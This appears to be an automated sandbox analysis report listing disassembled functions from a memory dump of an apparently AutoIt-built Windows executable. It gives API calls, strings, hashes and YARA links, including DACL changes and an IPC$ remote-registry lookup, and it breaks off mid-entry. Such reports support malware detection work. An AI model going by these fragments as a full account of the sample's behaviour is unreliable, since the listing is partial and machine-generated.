Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 4607b3c79dd75494ba5be02a30632d453ab35fa97e26ecb4bc2ce8e4c2ada104
Instruction ID: 5dbeceb3c4b490b08a904352c70762cea9c95651ba33526987714d7765502d51
Opcode Fuzzy Hash: 4607b3c79dd75494ba5be02a30632d453ab35fa97e26ecb4bc2ce8e4c2ada104
Instruction Fuzzy Hash: 6781587590020ABFDF11AFA4DD49AEE7FB9FF05304F044199F911B22A2DB318E159B60

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0429, Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

GetForegroundWindow.USER32(00B40980,?,?,?,?,?), ref: 00AD04E3
IsWindow.USER32(?), ref: 00B066BB

Strings

CLASS, xrefs: 00B064E5
TITLE, xrefs: 00B06650
ALL, xrefs: 00B06622
HANDLE, xrefs: 00B0649E
LAST, xrefs: 00B06472
REGEXPCLASS, xrefs: 00B06506
REGEXPTITLE, xrefs: 00B064B4
ACTIVE, xrefs: 00B06488
INSTANCE, xrefs: 00B065FA

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 761f0f0a14e3e0c77adeb5f9aa9208f14b15384f0c147f6438235fef9f7c8852
Instruction ID: e4c7dbb42f2ef6d359cee1c31f7816296e1388711eec2247003cdbbb62e0ced1
Opcode Fuzzy Hash: 761f0f0a14e3e0c77adeb5f9aa9208f14b15384f0c147f6438235fef9f7c8852
Instruction Fuzzy Hash: 72D172311046029FCB04EF20C581A9ABFF5FF55344F104A5EF896576A2DB31E969CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B0B8B6, Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B0B915

Strings

REGEXP=, xrefs: 00B0B92A
CLASSNAME=, xrefs: 00B0B952
[ACTIVE, xrefs: 00B0B902
[LAST, xrefs: 00B0B9C2
ALL, xrefs: 00B0B9A9
HANDLE=, xrefs: 00B0B90E
LAST, xrefs: 00B0B8DA
[ALL, xrefs: 00B0B9BB
[HANDLE:, xrefs: 00B0B921
ACTIVE, xrefs: 00B0B8F0
[REGEXPTITLE:, xrefs: 00B0B93D
[CLASS:, xrefs: 00B0B965

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 5a5d918be3ee6f96f4c00eafcb9b21df5b20dc55ceb84b84a756d279ef370ae6
Instruction ID: 932e3f642e1f93a53b94006a8ab89dccbddaba0cd628390fbbaefaf2a7e47e91
Opcode Fuzzy Hash: 5a5d918be3ee6f96f4c00eafcb9b21df5b20dc55ceb84b84a756d279ef370ae6
Instruction Fuzzy Hash: 99319271A44205A6DF14FBA0CE53FAD7BE4AF21790F6001A9F551B10E2EF996E04CA52

Uniqueness

Uniqueness Score: -1.00%

Function 00B3CCA6, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

DragQueryPoint.SHELL32(?,?), ref: 00B3CCCF

Part of subcall function 00B3B1A9: ClientToScreen.USER32(?,?), ref: 00B3B1D2
Part of subcall function 00B3B1A9: GetWindowRect.USER32 ref: 00B3B248
Part of subcall function 00B3B1A9: PtInRect.USER32(?,?,00B3C6BC), ref: 00B3B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00B3CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B3CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B3CD66
_wcscat.LIBCMT ref: 00B3CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B3CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00B3CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00B3CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00B3CDFF
DragFinish.SHELL32(?), ref: 00B3CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B3CEF9

Strings

@GUI_DRAGFILE, xrefs: 00B3CEA8
@GUI_DROPID, xrefs: 00B3CE26
@GUI_DRAGID, xrefs: 00B3CE71

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: cf04a7af18446de28120d146bdbb285588d2584c2029d31b46ca4f78d00bfc86
Instruction ID: 69fa025f4d81563c3cb34f22874dc53d9ef57d4b81e1fdde529b4b5917220c62
Opcode Fuzzy Hash: cf04a7af18446de28120d146bdbb285588d2584c2029d31b46ca4f78d00bfc86
Instruction Fuzzy Hash: 83614C72108301AFC711EF64DC85E9BBBF8EF89750F100A6DF695931A2DB709A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B182D5, Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00B1831A
VariantCopy.OLEAUT32(00000000,?), ref: 00B18323
VariantClear.OLEAUT32(00000000), ref: 00B1832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B1841D
__swprintf.LIBCMT ref: 00B1844D
VarR8FromDec.OLEAUT32(?,?), ref: 00B18479
VariantInit.OLEAUT32(?), ref: 00B1852A
SysFreeString.OLEAUT32(?), ref: 00B185BE
VariantClear.OLEAUT32(?), ref: 00B18618
VariantClear.OLEAUT32(?), ref: 00B18627
VariantInit.OLEAUT32(00000000), ref: 00B18665

Strings

Default, xrefs: 00B184DA
%4d%02d%02d%02d%02d%02d, xrefs: 00B18447

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 410e20d4da7fa42d61ce9bdb198a86f8557b8f15768a2e9388e37b7db6ff552a
Instruction ID: 5b812de56f5e3ba7cedf0bfadb23dd6e3a4dd381895372fda3b8cfdc8c04733d
Opcode Fuzzy Hash: 410e20d4da7fa42d61ce9bdb198a86f8557b8f15768a2e9388e37b7db6ff552a
Instruction Fuzzy Hash: 44D1CE31604515EBDB209F65E884BAEB7F4FF05B00F688599F419AB291DF30ED80DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A27B, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B1A2C2

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B1A2E3
__swprintf.LIBCMT ref: 00B1A33C
__swprintf.LIBCMT ref: 00B1A355
_wprintf.LIBCMT ref: 00B1A3FC
_wprintf.LIBCMT ref: 00B1A41A

Strings

^ ERROR , xrefs: 00B1A391
Incorrect parameters to object property !, xrefs: 00B1A39E
Line %d (File "%s"):, xrefs: 00B1A336, 00B1A34F
"%s" (%d) : ==> %s:%s%s, xrefs: 00B1A3F7
Error: , xrefs: 00B1A3C4
"%s" (%d) : ==> %s:, xrefs: 00B1A415

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 17f3a9173c52323de0401c9edc66df2919d2c47d9fa69c8446c37ddb7c63eb2e
Instruction ID: 0417011c3651689c556bc3e0a256711e4a62383daf15ea3cd8af4ffa3a03c2ca
Opcode Fuzzy Hash: 17f3a9173c52323de0401c9edc66df2919d2c47d9fa69c8446c37ddb7c63eb2e
Instruction Fuzzy Hash: 5F51A071A00119AACF14EBE0CE46EEEB7B8EF05340F5001A9F505B2162EF356F99DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B10065, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00AFF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B23FF9,00000000), ref: 00B1009A
LoadStringW.USER32(00000000,?,00AFF8B8,00000001), ref: 00B100A3

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

GetModuleHandleW.KERNEL32(00000000,00B77310,?,00000FFF,?,?,00AFF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B23FF9,00000000,00000001), ref: 00B100C5
LoadStringW.USER32(00000000,?,00AFF8B8,00000001), ref: 00B100C8
__swprintf.LIBCMT ref: 00B10118
__swprintf.LIBCMT ref: 00B10129
_wprintf.LIBCMT ref: 00B101D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B101E9

Strings

Line %d:, xrefs: 00B10123
^ ERROR, xrefs: 00B1017E
Line %d (File "%s"):, xrefs: 00B10112
Error: , xrefs: 00B101A0
%s (%d) : ==> %s: %s %s, xrefs: 00B101CD

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 2e6bbd5c3a2167fcafdc05d7a15563ceb4b7d0a3d2864ecdd3b5cec5863738ca
Instruction ID: 64752d2b2be47f5ca96daa3f016436fd4b4388017d4eb9e988cf856a5fe20bbc
Opcode Fuzzy Hash: 2e6bbd5c3a2167fcafdc05d7a15563ceb4b7d0a3d2864ecdd3b5cec5863738ca
Instruction Fuzzy Hash: 91415072900119AACF14FBD0CE86EEEB7B8EF19340F510169F505B2092EA756F59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B3C854, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B3C8A4
GetFocus.USER32(?,?,?,?), ref: 00B3C8B4
GetDlgCtrlID.USER32(00000000), ref: 00B3C8BF
_memset.LIBCMT ref: 00B3C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B3CA15
GetMenuItemCount.USER32 ref: 00B3CA35
GetMenuItemID.USER32(?,00000000), ref: 00B3CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B3CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B3CAC4
CheckMenuRadioItem.USER32 ref: 00B3CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B3CB31

Strings

0, xrefs: 00B3C9E2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: b7b1099c9284df3a1e3c5926f64243b65790b0f6ac94da7f82ce7e70cb179a67
Instruction ID: f0429fa9b0da174f9af420c8372275a86ed4469f24793a833ae3338d01061674
Opcode Fuzzy Hash: b7b1099c9284df3a1e3c5926f64243b65790b0f6ac94da7f82ce7e70cb179a67
Instruction Fuzzy Hash: 6F817C75208305AFD710DF54C985E6BBBE8FF88354F20499EF999A3291DB30D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B08ACA, Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B08E3C
Part of subcall function 00B08E20: GetLastError.KERNEL32(?,00B08900,?,?,?), ref: 00B08E46
Part of subcall function 00B08E20: GetProcessHeap.KERNEL32(00000008,?,?,00B08900,?,?,?), ref: 00B08E55
Part of subcall function 00B08E20: HeapAlloc.KERNEL32(00000000,?,00B08900,?,?,?), ref: 00B08E5C
Part of subcall function 00B08E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B08E73

Part of subcall function 00B08EBD: GetProcessHeap.KERNEL32(00000008,00B08916,00000000,00000000,?,00B08916,?), ref: 00B08EC9
Part of subcall function 00B08EBD: HeapAlloc.KERNEL32(00000000,?,00B08916,?), ref: 00B08ED0
Part of subcall function 00B08EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B08916,?), ref: 00B08EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B08B2E
_memset.LIBCMT ref: 00B08B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B08B62
GetLengthSid.ADVAPI32(?), ref: 00B08B73
GetAce.ADVAPI32(?,00000000,?), ref: 00B08BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B08BCC
GetLengthSid.ADVAPI32(?), ref: 00B08BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B08BF8
HeapAlloc.KERNEL32(00000000), ref: 00B08BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B08C20
CopySid.ADVAPI32(00000000), ref: 00B08C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B08C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B08C7E
SetUserObjectSecurity.USER32 ref: 00B08C92

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9b9851cde03c06ca9abf9605704f32b2ba87d754c31c002e8877a6ff2cb8cef5
Instruction ID: 2dffa4a55c532e3249aab9b2a14df4c846f437653c09c927e91b22c9642bc0f6
Opcode Fuzzy Hash: 9b9851cde03c06ca9abf9605704f32b2ba87d754c31c002e8877a6ff2cb8cef5
Instruction Fuzzy Hash: 85613A75900209EFDF10DF95DC45EAEBBB9FF05300F0482A9EA95A7290DF759A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A48D, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B1A4D4

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 00B1A4F6
__swprintf.LIBCMT ref: 00B1A54F
__swprintf.LIBCMT ref: 00B1A568
_wprintf.LIBCMT ref: 00B1A61E
_wprintf.LIBCMT ref: 00B1A63C

Strings

^ ERROR, xrefs: 00B1A5C0
Line %d (File "%s"):, xrefs: 00B1A549, 00B1A562
"%s" (%d) : ==> %s:%s%s, xrefs: 00B1A619
Error: , xrefs: 00B1A5E6
"%s" (%d) : ==> %s:, xrefs: 00B1A637

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: b29c0392e4956733d14724c3f0d739f505dbdd9ecca425f3a08c7decf7eb021e
Instruction ID: 8fecfab78e6b957cf79512bc77be6882abef5eda85f58a011c3f6f03e6e2050f
Opcode Fuzzy Hash: b29c0392e4956733d14724c3f0d739f505dbdd9ecca425f3a08c7decf7eb021e
Instruction Fuzzy Hash: EF51AF71900109AACF14EBE0CE86EEEB7B9EF15340F5001A9F505B21A2EF316F99CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5BD7, Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC5BF1
GetMenuItemCount.USER32 ref: 00B00E7B
GetMenuItemCount.USER32 ref: 00B00F2B
GetCursorPos.USER32(?), ref: 00B00F6F
SetForegroundWindow.USER32(00000000), ref: 00B00F78
TrackPopupMenuEx.USER32(00B77890,00000000,?,00000000,00000000,00000000), ref: 00B00F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B00F97

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 1af774a4a7119d41071f578081b1effa5e4db5a83e5ba75793b547cc699455b3
Instruction ID: fc114f0b40da86fe29a0ce5598d4eb3cdc99d8089863f280a66afe4fe9fa6424
Opcode Fuzzy Hash: 1af774a4a7119d41071f578081b1effa5e4db5a83e5ba75793b547cc699455b3
Instruction Fuzzy Hash: F271E670A54705BFEB20AB64DC89FAABFA4FF05364F104256F614661D1CBB16CA0DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B083FA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

_memset.LIBCMT ref: 00B08489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B084BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B084DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B084F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B08520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B08548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B08553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B08558

Strings

\IPC$, xrefs: 00B084A0
\CLSID, xrefs: 00B08440
SOFTWARE\Classes\, xrefs: 00B0842A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: d31620bb78106dcbde36d19b26600e2c76f2432f8e499868dc29c51e5d630834
Instruction ID: 54cdfb37be1af6859951d7968768a6785113dacd289eb2b1bab9ada48bb42d10
Opcode Fuzzy Hash: d31620bb78106dcbde36d19b26600e2c76f2432f8e499868dc29c51e5d630834
Instruction Fuzzy Hash: 30411976D1022DABCF11EBA4DD95EEDBBB8FF15340F014169E945A32A1EA349E04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B0FF5C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AFFB41,00000010,?,Bad directive syntax error,00B40980,00000000,?,?,?), ref: 00B0FF7D
LoadStringW.USER32(00000000,?,00AFFB41,00000010), ref: 00B0FF84

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

_wprintf.LIBCMT ref: 00B0FFB7
__swprintf.LIBCMT ref: 00B0FFD9
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B10048

Strings

Line %d:, xrefs: 00B0FFD3
Error: , xrefs: 00B10016
., xrefs: 00B1002E
Line %d (File "%s"):, xrefs: 00B0FFEE
%s (%d) : ==> %s.: %s %s, xrefs: 00B0FFB2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: d917e9d974baa7de0dbef8d54be0c1ec7777a7e2d38b9aa9c38d7b1780385f35
Instruction ID: 67b0a48b882e60e4bf85aef8dc2f1c79a7ef7efb8cfdd2e615f747330f860c30
Opcode Fuzzy Hash: d917e9d974baa7de0dbef8d54be0c1ec7777a7e2d38b9aa9c38d7b1780385f35
Instruction Fuzzy Hash: B221913295021EABCF11EF90CD4AFEE77B5FF19340F04049AF505620A2DA71AA28DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AB23F7, Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AB2412,?,00000000,?,?,?,?,00AB1AA7,00000000,?), ref: 00AB1F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AB24AF
KillTimer.USER32(00000000,?,?,?,?,00AB1AA7,00000000,?,?,00AB1EBE,?,?), ref: 00AB254A
DestroyAcceleratorTable.USER32 ref: 00AEBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AB1AA7,00000000,?,?,00AB1EBE,?,?), ref: 00AEC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AB1AA7,00000000,?,?,00AB1EBE,?,?), ref: 00AEC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AB1AA7,00000000,?,?,00AB1EBE,?,?), ref: 00AEC04B
DeleteObject.GDI32(00000000), ref: 00AEC05D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 8b950550d70d9a92b53aafd52a134d095913c70a076e6ef4abddfc7195ffeda6
Instruction ID: 57fb707c04f2b931120b8108018d4820da63b6a95911f2cf750710a596cbad1f
Opcode Fuzzy Hash: 8b950550d70d9a92b53aafd52a134d095913c70a076e6ef4abddfc7195ffeda6
Instruction Fuzzy Hash: 2661CC31124601DFDB35AF1AC948B6A7BF5FB40322F10862EE05A4BA61CB75AC91DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2581, Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00AB29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AB29BC

GetSysColor.USER32(0000000F), ref: 00AB25AF

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
